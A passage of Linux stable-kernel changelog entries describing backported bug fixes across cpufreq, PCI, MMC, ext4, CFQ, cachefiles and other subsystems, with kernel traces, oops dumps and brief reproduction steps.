is possible that MSR_PM_ENABLE was not to set to 0x01 on that CPU.
This will cause GP fault. So like other places in this path
rdmsrl_on_cpu should be used instead of rdmsrl.
Moreover the scope of MSR_HWP_CAPABILITIES is on per thread basis, so it
should be read from the same CPU, for which MSR MSR_HWP_REQUEST is
getting set.
dmesg dump or warning:
[ 22.014488] WARNING: CPU: 139 PID: 1 at arch/x86/mm/extable.c:50 ex_handler_rdmsr_unsafe+0x68/0x70
[ 22.014492] unchecked MSR access error: RDMSR from 0x771
[ 22.014493] Modules linked in:
[ 22.014507] CPU: 139 PID: 1 Comm: swapper/0 Not tainted 4.7.5+ #1
...
...
[ 22.014516] Call Trace:
[ 22.014542] [<ffffffff813d7dd1>] dump_stack+0x63/0x82
[ 22.014558] [<ffffffff8107bc8b>] __warn+0xcb/0xf0
[ 22.014561] [<ffffffff8107bcff>] warn_slowpath_fmt+0x4f/0x60
[ 22.014563] [<ffffffff810676f8>] ex_handler_rdmsr_unsafe+0x68/0x70
[ 22.014564] [<ffffffff810677d9>] fixup_exception+0x39/0x50
[ 22.014604] [<ffffffff8102e400>] do_general_protection+0x80/0x150
[ 22.014610] [<ffffffff817f9ec8>] general_protection+0x28/0x30
[ 22.014635] [<ffffffff81687940>] ? get_target_pstate_use_performance+0xb0/0xb0
[ 22.014642] [<ffffffff810600c7>] ? native_read_msr+0x7/0x40
[ 22.014657] [<ffffffff81688123>] intel_pstate_hwp_set+0x23/0x130
[ 22.014660] [<ffffffff81688406>] intel_pstate_set_policy+0x1b6/0x340
[ 22.014662] [<ffffffff816829bb>] cpufreq_set_policy+0xeb/0x2c0
[ 22.014664] [<ffffffff81682f39>] cpufreq_init_policy+0x79/0xe0
[ 22.014666] [<ffffffff81682cb0>] ? cpufreq_update_policy+0x120/0x120
[ 22.014669] [<ffffffff816833a6>] cpufreq_online+0x406/0x820
[ 22.014671] [<ffffffff8168381f>] cpufreq_add_dev+0x5f/0x90
[ 22.014717] [<ffffffff81530ac8>] subsys_interface_register+0xb8/0x100
[ 22.014719] [<ffffffff816821bc>] cpufreq_register_driver+0x14c/0x210
[ 22.014749] [<ffffffff81fe1d90>] intel_pstate_init+0x39d/0x4d5
[ 22.014751] [<ffffffff81fe13f2>] ? cpufreq_gov_dbs_init+0x12/0x12
Signed-off-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit abb6627910 upstream.
Commit d352cf47d9 (cpufreq: conservative: Do not use transition
notifications) overlooked the case when the "frequency step" used
by the conservative governor is small relative to the distances
between the available frequencies and broke the algorithm by
using policy->cur instead of the previously requested frequency
when computing the next one.
As a result, the governor may not be able to go outside of a narrow
range between two consecutive available frequencies.
Fix the problem by making the governor save the previously requested
frequency and select the next one relative that value (unless it is
out of range, in which case policy->cur will be used instead).
Fixes: d352cf47d9 (cpufreq: conservative: Do not use transition notifications)
Link: https://bugzilla.kernel.org/show_bug.cgi?id=177171
Reported-and-tested-by: Aleksey Rybalkin <aleksey@rybalkin.org>
Acked-by: Viresh Kumar <viresh.kumar@linaro.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e01072d22d upstream.
Now that the cpufreq-dt-platdev is used to create the cpufreq-dt platform
device for all OMAP platforms and the platform code that did it
before has been removed, add ti,am33xx and ti,dra7xx to the machine list
in cpufreq-dt-platdev which had relied on the removed platform code to do
this previously.
Fixes: 7694ca6e1d (cpufreq: omap: Use generic platdev driver)
Signed-off-by: Dave Gerlach <d-gerlach@ti.com>
Acked-by: Viresh Kumar <viresh.kumar@linaro.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e330b9a6bb upstream.
of_irq_get[_byname]() return 0 iff irq_create_of_mapping() call fails.
Returning both error code and 0 on failure is a sign of a misdesigned API,
it makes the failure check unnecessarily complex and error prone. We should
rely on the platform IRQ resource in this case, not return 0, especially
as 0 can be a valid IRQ resource too...
Fixes: aff008ad81 ("platform_get_irq: Revert to platform_get_resource if of_irq_get fails")
Signed-off-by: Sergei Shtylyov <sergei.shtylyov@cogentembedded.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8dd99bca7b upstream.
The tegra_pcie_phy_disable() path called pads_writel() with arguments in
the wrong order. Swap them to be the "value, offset" order expected by
pads_writel().
Fixes: 6fe7c187e0 ("PCI: tegra: Support per-lane PHYs")
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Thierry Reding <treding@nvidia.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8e2e031799 upstream.
Similar to the AR93xx and the AR94xx series, the AR95xx also have the same
quirk for the Bus Reset. It will lead to instant system reset if the
device is assigned via VFIO to a KVM VM. I've been able reproduce this
behavior with a MikroTik R11e-2HnD.
Fixes: c3e59ee4e7 ("PCI: Mark Atheros AR93xx to avoid bus reset")
Signed-off-by: Maik Broemme <mbroemme@libmpq.org>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 02265cd603 upstream.
Potentially overflowing expression 1000000 * data->timeout_clks with
type unsigned int is evaluated using 32-bit arithmetic, and then used
in a context that expects an expression of type unsigned long long.
To avoid overflow, cast 1000000U to type unsigned long long.
Special thanks to Coverity.
Fixes: 7f05538af7 ("mmc: sdhci: fix data timeout (part 2)")
Signed-off-by: Haibo Chen <haibo.chen@nxp.com>
Acked-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0ed50abb2d upstream.
CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed to terminate
multi-block transfers only with CMD12.
The patch fixes the following problem:
mmc0: new MMC card at address 0001
mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
...
blk_update_request: I/O error, dev mmcblk0, sector 0
Buffer I/O error on dev mmcblk0, logical block 0, async page read
mmcblk0: unable to read partition table
Signed-off-by: Daniel Glöckner <dg@emlix.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0c9d349153 upstream.
Some RTL8821AE devices sold in Great Britain have the country code of
0x25 encoded in their EEPROM. This value is not tested in the routine
that establishes the regulatory info for the chip. The fix is to set
this code to have the same capabilities as the EU countries. In addition,
the channels allowed for COUNTRY_CODE_ETSI were more properly suited
for China and Israel, not the EU. This problem has also been fixed.
Signed-off-by: Larry Finger <Larry.Finger@lwfinger.net>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0628467f97 upstream.
Firmware is running watchdog timer for tracking copy engine ring index
and write index. Whenever both indices are stuck at same location for
given duration, watchdog will be trigger to assert target. While
updating copy engine destination ring write index, driver ensures that
write index will not be same as read index by finding delta between these
two indices (CE_RING_DELTA).
HTT target to host copy engine (CE5) is special case where ring buffers
will be reused and delta check is not applied while updating write index.
In rare scenario, whenever CE5 ring is full, both indices will be referring
same location and this is causing CE ring stuck issue as explained
above. This issue is originally reported on IPQ4019 during long hour stress
testing and during veriwave max clients testsuites. The same issue is
also observed in other chips as well. Fix this by ensuring that write
index is one less than read index which means that full ring is
available for receiving data.
Tested-by: Tamizh chelvam <c_traja@qti.qualcomm.com>
Signed-off-by: Rajkumar Manoharan <rmanohar@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c8a9a6dacc upstream.
there define two devfreq_event_get_drvdata() function in devfreq-event.h
when disable CONFIG_PM_DEVFREQ_EVENT, it will lead to build fail. So
remove devfreq_event_get_drvdata() function.
Fixes: f262f28c14 ("PM / devfreq: event: Add devfreq_event class")
Signed-off-by: Lin Huang <hl@rock-chips.com>
Signed-off-by: Chanwoo Choi <cw00.choi@samsung.com>
Signed-off-by: MyungJoo Ham <myungjoo.ham@samsung.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0278b34bf1 upstream.
Sometimes spidev_test crashes with:
*** Error in `spidev_test': munmap_chunk(): invalid pointer: 0x00022020 ***
Aborted
or just
Segmentation fault
This is due to transfer_escaped_string() miscalculating the required
size of the buffer by one byte, causing a buffer overflow in unescape().
Drop the bogus "+ 1" in the strlen() parameter to fix this.
Note that unescape() never copies the zero-terminator of the source
string, so it writes at most as many bytes as the length of the source
string.
Fixes: 30061915be (spi: spidev_test: Added input buffer from the terminal)
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b1d51b448e upstream.
The current clock tree only implements the minimal set of differences
between the i.MX6Q and the i.MX6DL, but that doesn't really reflect
reality.
Apply the following fixes to match the RM:
- DL has no GPU3D_SHADER_SEL/PODF, the shader domain is clocked by
GPU3D_CORE
- GPU3D_SHADER_SEL/PODF has been repurposed as GPU2D_CORE_SEL/PODF
- GPU2D_CORE_SEL/PODF has been repurposed as MLB_SEL/PODF
Signed-off-by: Lucas Stach <l.stach@pengutronix.de>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8846023ae upstream.
Initialize the GPU clock muxes to sane inputs. Until now they have
not been changed from their default values, which means that both
GPU3D shader and GPU2D core were fed by clock inputs whose rates
exceed the maximium allowed frequency of the cores by as much as
200MHz.
This fixes a severe GPU stability issue on i.MX6DL.
Signed-off-by: Lucas Stach <l.stach@pengutronix.de>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8f9165c981 upstream.
http://www.ti.com/lit/pdf/SWCZ010:
DCDC o/p voltage can go higher than programmed value
Impact:
VDDI, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.
Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
clock of VDD1 and VDD2
* Turn-on of VDD1 and VDD2 HSD PFETis synchronized or at a constant
phase shift
* Current pulled though VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
possible switching noise on the application. This noise level depends
on the layout, the VBAT level, and the load current. The noise level
increases with improper layout.
When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled though VCC1+VCC2 average of Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
causing lower overall switching noise.
Workaround:
Set DCDCCTRL_REG[1:0]= 00.
Signed-off-by: Jan Remmet <j.remmet@phytec.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d71cf15b86 upstream.
From the beginning of the gpio-mpc8xxx.c, the "handle_level_irq"
has being used to handle GPIO interrupts in the PowerPC/Layerscape
platforms. But actually, almost all PowerPC/Layerscape platforms
assert an interrupt request upon either a high-to-low change or
any change on the state of the signal.
So the "handle_level_irq" is not reasonable for PowerPC/Layerscape
GPIO interrupt, it should be "handle_edge_irq". Otherwise the system
may lost some interrupts from the PIN's state changes.
Signed-off-by: Liu Gang <Gang.Liu@nxp.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3932a86b4b upstream.
While debugging timeouts happening in my application workload (ScyllaDB), I have
observed calls to open() taking a long time, ranging everywhere from 2 seconds -
the first ones that are enough to time out my application - to more than 30
seconds.
The problem seems to happen because XFS may block on pending metadata updates
under certain circumnstances, and that's confirmed with the following backtrace
taken by the offcputime tool (iovisor/bcc):
ffffffffb90c57b1 finish_task_switch
ffffffffb97dffb5 schedule
ffffffffb97e310c schedule_timeout
ffffffffb97e1f12 __down
ffffffffb90ea821 down
ffffffffc046a9dc xfs_buf_lock
ffffffffc046abfb _xfs_buf_find
ffffffffc046ae4a xfs_buf_get_map
ffffffffc046babd xfs_buf_read_map
ffffffffc0499931 xfs_trans_read_buf_map
ffffffffc044a561 xfs_da_read_buf
ffffffffc0451390 xfs_dir3_leaf_read.constprop.16
ffffffffc0452b90 xfs_dir2_leaf_lookup_int
ffffffffc0452e0f xfs_dir2_leaf_lookup
ffffffffc044d9d3 xfs_dir_lookup
ffffffffc047d1d9 xfs_lookup
ffffffffc0479e53 xfs_vn_lookup
ffffffffb925347a path_openat
ffffffffb9254a71 do_filp_open
ffffffffb9242a94 do_sys_open
ffffffffb9242b9e sys_open
ffffffffb97e42b2 entry_SYSCALL_64_fastpath
00007fb0698162ed [unknown]
Inspecting my run with blktrace, I can see that the xfsaild kthread exhibit very
high "Dispatch wait" times, on the dozens of seconds range and consistent with
the open() times I have saw in that run.
Still from the blktrace output, we can after searching a bit, identify the
request that wasn't dispatched:
8,0 11 152 81.092472813 804 A WM 141698288 + 8 <- (8,1) 141696240
8,0 11 153 81.092472889 804 Q WM 141698288 + 8 [xfsaild/sda1]
8,0 11 154 81.092473207 804 G WM 141698288 + 8 [xfsaild/sda1]
8,0 11 206 81.092496118 804 I WM 141698288 + 8 ( 22911) [xfsaild/sda1]
<==== 'I' means Inserted (into the IO scheduler) ===================================>
8,0 0 289372 96.718761435 0 D WM 141698288 + 8 (15626265317) [swapper/0]
<==== Only 15s later the CFQ scheduler dispatches the request ======================>
As we can see above, in this particular example CFQ took 15 seconds to dispatch
this request. Going back to the full trace, we can see that the xfsaild queue
had plenty of opportunity to run, and it was selected as the active queue many
times. It would just always be preempted by something else (example):
8,0 1 0 81.117912979 0 m N cfq1618SN / insert_request
8,0 1 0 81.117913419 0 m N cfq1618SN / add_to_rr
8,0 1 0 81.117914044 0 m N cfq1618SN / preempt
8,0 1 0 81.117914398 0 m N cfq767A / slice expired t=1
8,0 1 0 81.117914755 0 m N cfq767A / resid=40
8,0 1 0 81.117915340 0 m N / served: vt=1948520448 min_vt=1948520448
8,0 1 0 81.117915858 0 m N cfq767A / sl_used=1 disp=0 charge=0 iops=1 sect=0
where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB
IO dispatchers.
The requests preempting the xfsaild queue are synchronous requests. That's a
characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests.
While it can be argued that preempting ASYNC requests in favor of SYNC is part
of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's
goal.
Moreover, unless I am misunderstanding something, that breaks the expectation
set by the "fifo_expire_async" tunable, which in my system is set to the
default.
Looking at the code, it seems to me that the issue is that after we make
an async queue active, there is no guarantee that it will execute any request.
When the queue itself tests if it cfq_may_dispatch() it can bail if it sees SYNC
requests in flight. An incoming request from another queue can also preempt it
in such situation before we have the chance to execute anything (as seen in the
trace above).
This patch sets the must_dispatch flag if we notice that we have requests
that are already fifo_expired. This flag is always cleared after
cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin
the queue for subsequent requests (unless they are themselves expired)
Care is taken during preempt to still allow rt requests to preempt us
regardless.
Testing my workload with this patch applied produces much better results.
From the application side I see no timeouts, and the open() latency histogram
generated by systemtap looks much better, with the worst outlier at 131ms:
Latency histogram of xfs_buf_lock acquisition (microseconds):
value |-------------------------------------------------- count
0 | 11
1 |@@@@ 161
2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 1966
4 |@ 54
8 | 36
16 | 7
32 | 0
64 | 0
~
1024 | 0
2048 | 0
4096 | 1
8192 | 1
16384 | 2
32768 | 0
65536 | 0
131072 | 1
262144 | 0
524288 | 0
Signed-off-by: Glauber Costa <glauber@scylladb.com>
CC: Jens Axboe <axboe@kernel.dk>
CC: linux-block@vger.kernel.org
CC: linux-kernel@vger.kernel.org
Signed-off-by: Glauber Costa <glauber@scylladb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c09f12186d upstream.
Commit 209851649d "acpi: nfit: Add support for hot-add" added
support for _FIT notifications, but it neglected to verify the
notification event code matches the one in the ACPI spec for
"NFIT Update". Currently there is only one code in the spec, but
once additional codes are added, older kernels (without this fix)
will misbehave by assuming all event notifications are for an
NFIT Update.
Fixes: 209851649d ("acpi: nfit: Add support for hot-add")
Cc: <linux-acpi@vger.kernel.org>
Cc: Dan Williams <dan.j.williams@intel.com>
Reported-by: Linda Knippers <linda.knippers@hpe.com>
Signed-off-by: Vishal Verma <vishal.l.verma@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c2cbc38b97 upstream.
Before commit a325725633 ("drm: Lobotomize set_busid nonsense for !pci
drivers"), several DRM drivers for platform devices used to expose an
explicit "drm_driver.set_busid" callback, invariably backed by
drm_platform_set_busid().
Commit a325725633 removed drm_platform_set_busid(), along with the
referring .set_busid field initializations. This was justified because
interchangeable functionality had been implemented in drm_dev_alloc() /
drm_dev_init(), which DRM_IOCTL_SET_VERSION would rely on going forward.
However, commit a325725633 also removed drm_virtio_set_busid(), for
which the same consolidation was not appropriate: this .set_busid callback
had been implemented with drm_pci_set_busid(), and not
drm_platform_set_busid(). The error regressed Xorg/xserver on QEMU's
"virtio-vga" card; the drmGetBusid() function from libdrm would no longer
return stable PCI identifiers like "pci:0000:00:02.0", but rather unstable
platform ones like "virtio0".
Reinstate drm_virtio_set_busid() with judicious use of
git checkout -p a325725633c2^ -- drivers/gpu/drm/virtio
Cc: Daniel Vetter <daniel.vetter@intel.com>
Cc: Emil Velikov <emil.l.velikov@gmail.com>
Cc: Gerd Hoffmann <kraxel@redhat.com>
Cc: Gustavo Padovan <gustavo.padovan@collabora.co.uk>
Cc: Hans de Goede <hdegoede@redhat.com>
Cc: Joachim Frieben <jfrieben@hotmail.com>
Reported-by: Joachim Frieben <jfrieben@hotmail.com>
Fixes: a325725633
Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1366842
Signed-off-by: Laszlo Ersek <lersek@redhat.com>
Reviewed-by: Emil Velikov <emil.l.velikov@gmail.com>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a818101d7b upstream.
An NULL-pointer dereference happens in cachefiles_mark_object_inactive()
when it tries to read i_blocks so that it can tell the cachefilesd daemon
how much space it's making available.
The problem is that cachefiles_drop_object() calls
cachefiles_mark_object_inactive() after calling cachefiles_delete_object()
because the object being marked active staves off attempts to (re-)use the
file at that filename until after it has been deleted. This means that
d_inode is NULL by the time we come to try to access it.
To fix the problem, have the caller of cachefiles_mark_object_inactive()
supply the number of blocks freed up.
Without this, the following oops may occur:
BUG: unable to handle kernel NULL pointer dereference at 0000000000000098
IP: [<ffffffffa06c5cc1>] cachefiles_mark_object_inactive+0x61/0xb0 [cachefiles]
...
CPU: 11 PID: 527 Comm: kworker/u64:4 Tainted: G I ------------ 3.10.0-470.el7.x86_64 #1
Hardware name: Hewlett-Packard HP Z600 Workstation/0B54h, BIOS 786G4 v03.19 03/11/2011
Workqueue: fscache_object fscache_object_work_func [fscache]
task: ffff880035edaf10 ti: ffff8800b77c0000 task.ti: ffff8800b77c0000
RIP: 0010:[<ffffffffa06c5cc1>] cachefiles_mark_object_inactive+0x61/0xb0 [cachefiles]
RSP: 0018:ffff8800b77c3d70 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff8800bf6cc400 RCX: 0000000000000034
RDX: 0000000000000000 RSI: ffff880090ffc710 RDI: ffff8800bf761ef8
RBP: ffff8800b77c3d88 R08: 2000000000000000 R09: 0090ffc710000000
R10: ff51005d2ff1c400 R11: 0000000000000000 R12: ffff880090ffc600
R13: ffff8800bf6cc520 R14: ffff8800bf6cc400 R15: ffff8800bf6cc498
FS: 0000000000000000(0000) GS:ffff8800bb8c0000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000098 CR3: 00000000019ba000 CR4: 00000000000007e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Stack:
ffff880090ffc600 ffff8800bf6cc400 ffff8800867df140 ffff8800b77c3db0
ffffffffa06c48cb ffff880090ffc600 ffff880090ffc180 ffff880090ffc658
ffff8800b77c3df0 ffffffffa085d846 ffff8800a96b8150 ffff880090ffc600
Call Trace:
[<ffffffffa06c48cb>] cachefiles_drop_object+0x6b/0xf0 [cachefiles]
[<ffffffffa085d846>] fscache_drop_object+0xd6/0x1e0 [fscache]
[<ffffffffa085d615>] fscache_object_work_func+0xa5/0x200 [fscache]
[<ffffffff810a605b>] process_one_work+0x17b/0x470
[<ffffffff810a6e96>] worker_thread+0x126/0x410
[<ffffffff810a6d70>] ? rescuer_thread+0x460/0x460
[<ffffffff810ae64f>] kthread+0xcf/0xe0
[<ffffffff810ae580>] ? kthread_create_on_node+0x140/0x140
[<ffffffff81695418>] ret_from_fork+0x58/0x90
[<ffffffff810ae580>] ? kthread_create_on_node+0x140/0x140
The oopsing code shows:
callq 0xffffffff810af6a0 <wake_up_bit>
mov 0xf8(%r12),%rax
mov 0x30(%rax),%rax
mov 0x98(%rax),%rax <---- oops here
lock add %rax,0x130(%rbx)
where this is:
d_backing_inode(object->dentry)->i_blocks
Fixes: a5b3a80b89 (CacheFiles: Provide read-and-reset release counters for cachefilesd)
Reported-by: Jianhong Yin <jiyin@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Reviewed-by: Steve Dickson <steved@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f2b20f6ee8 upstream.
This fixes a bug where the permission was not properly checked in
overlayfs. The testcase is ltp/utimensat01.
It is also cleaner and safer to do the permission checking in the vfs
helper instead of the caller.
This patch introduces an additional ia_valid flag ATTR_TOUCH (since
touch(1) is the most obvious user of utimes(NULL)) that is passed into
notify_change whenever the conditions for this special permission checking
mode are met.
Reported-by: Aihua Zhang <zhangaihua1@huawei.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Tested-by: Aihua Zhang <zhangaihua1@huawei.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3a8db79889 upstream.
After backporting commit ee44b4bc05 ("dlm: use sctp 1-to-1 API")
series to a kernel with an older workqueue which didn't use RCU yet, it
was noticed that we are freeing the workqueues in dlm_lowcomms_stop()
too early as free_conn() will try to access that memory for canceling
the queued works if any.
This issue was introduced by commit 0d737a8cfd as before it such
attempt to cancel the queued works wasn't performed, so the issue was
not present.
This patch fixes it by simply inverting the free order.
Fixes: 0d737a8cfd ("dlm: fix race while closing connections")
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David Teigland <teigland@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 80da44c29d upstream.
This patch changes the p8_ghash driver to use ghash-generic as a fixed
fallback implementation. This allows the correct value of descsize to be
defined directly in its shash_alg structure and avoids problems with
incorrect buffer sizes when its state is exported or imported.
Reported-by: Jan Stancek <jstancek@redhat.com>
Fixes: cc333cd68d ("crypto: vmx - Adding GHASH routines for VMX module")
Signed-off-by: Marcelo Cerri <marcelo.cerri@canonical.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a397ba829d upstream.
Move common values and types used by ghash-generic to a new header file
so drivers can directly use ghash-generic as a fallback implementation.
Fixes: cc333cd68d ("crypto: vmx - Adding GHASH routines for VMX module")
Signed-off-by: Marcelo Cerri <marcelo.cerri@canonical.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9b623df614 upstream.
When zeroing blocks for DAX allocations, we also have to unmap aliases
in the block device mappings. Otherwise writeback can overwrite zeros
with stale data from block device page cache.
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e81d44778d upstream.
The commit 6050d47adc: "ext4: bail out from make_indexed_dir() on
first error" could end up leaking bh2 in the error path.
[ Also avoid renaming bh2 to bh, which just confuses things --tytso ]
Signed-off-by: yangsheng <yngsion@gmail.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cca32b7eeb upstream.
Currently when doing a DAX hole punch with ext4 we fail to do a writeback.
This is because the logic around filemap_write_and_wait_range() in
ext4_punch_hole() only looks for dirty page cache pages in the radix tree,
not for dirty DAX exceptional entries.
Signed-off-by: Ross Zwisler <ross.zwisler@linux.intel.com>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4e800c0359 upstream.
Pages clear buffers after ext4 delayed block allocation failed,
However, it does not clean its pte_dirty flag.
if the pages unmap ,in cording to the pte_dirty ,
unmap_page_range may try to call __set_page_dirty,
which may lead to the bugon at
mpage_prepare_extent_to_map:head = page_buffers(page);.
This patch just call clear_page_dirty_for_io to clean pte_dirty
at mpage_release_unused_pages for pages mmaped.
Steps to reproduce the bug:
(1) mmap a file in ext4
addr = (char *)mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_SHARED,
fd, 0);
memset(addr, 'i', 4096);
(2) return EIO at
ext4_writepages->mpage_map_and_submit_extent->mpage_map_one_extent
which causes this log message to be print:
ext4_msg(sb, KERN_CRIT,
"Delayed block allocation failed for "
"inode %lu at logical offset %llu with"
" max blocks %u with error %d",
inode->i_ino,
(unsigned long long)map->m_lblk,
(unsigned)map->m_len, -err);
(3)Unmap the addr cause warning at
__set_page_dirty:WARN_ON_ONCE(warn && !PageUptodate(page));
(4) wait for a minute,then bugon happen.
Signed-off-by: wangguang <wangguang03@zte.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 93e3b4e663 upstream.
Now, ext4_do_update_inode() clears high 16-bit fields of uid/gid
of deleted and evicted inode to fix up interoperability with old
kernels. However, it checks only i_dtime of an inode to determine
whether the inode was deleted and evicted, and this is very risky,
because i_dtime can be used for the pointer maintaining orphan inode
list, too. We need to further check whether the i_dtime is being
used for the orphan inode list even if the i_dtime is not NULL.
We found that high 16-bit fields of uid/gid of inode are unintentionally
and permanently cleared when the inode truncation is just triggered,
but not finished, and the inode metadata, whose high uid/gid bits are
cleared, is written on disk, and the sudden power-off follows that
in order.
Signed-off-by: Daeho Jeong <daeho.jeong@samsung.com>
Signed-off-by: Hobin Woo <hobin.woo@samsung.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 14fbd4aa61 upstream.
Online defragging of encrypted files is not currently implemented.
However, the move extent ioctl can still return successfully when
called. For example, this occurs when xfstest ext4/020 is run on an
encrypted file system, resulting in a corrupted test file and a
corresponding test failure.
Until the proper functionality is implemented, fail the move extent
ioctl if either the original or donor file is encrypted.
Signed-off-by: Eric Whitney <enwlinux@gmail.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e03a9976af upstream.
Thomas has reported a lockdep splat hitting in
add_transaction_credits(). The problem is that that function calls
jbd2_might_wait_for_commit() while holding j_state_lock which is wrong
(we do not really wait for transaction commit while holding that lock).
Fix the problem by moving jbd2_might_wait_for_commit() into places where
we are ready to wait for transaction commit and thus j_state_lock is
unlocked.
Fixes: 1eaa566d36
Reported-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c2a9737f45 upstream.
We triggered a deadloop in truncate_inode_pages_range() on 32 bits
architecture with the test case bellow:
...
fd = open();
write(fd, buf, 4096);
preadv64(fd, &iovec, 1, 0xffffffff000);
ftruncate(fd, 0);
...
Then ftruncate() will not return forever.
The filesystem used in this case is ubifs, but it can be triggered on
many other filesystems.
When preadv64() is called with offset=0xffffffff000, a page with
index=0xffffffff will be added to the radix tree of ->mapping. Then
this page can be found in ->mapping with pagevec_lookup(). After that,
truncate_inode_pages_range(), which is called in ftruncate(), will fall
into an infinite loop:
- find a page with index=0xffffffff, since index>=end, this page won't
be truncated
- index++, and index become 0
- the page with index=0xffffffff will be found again
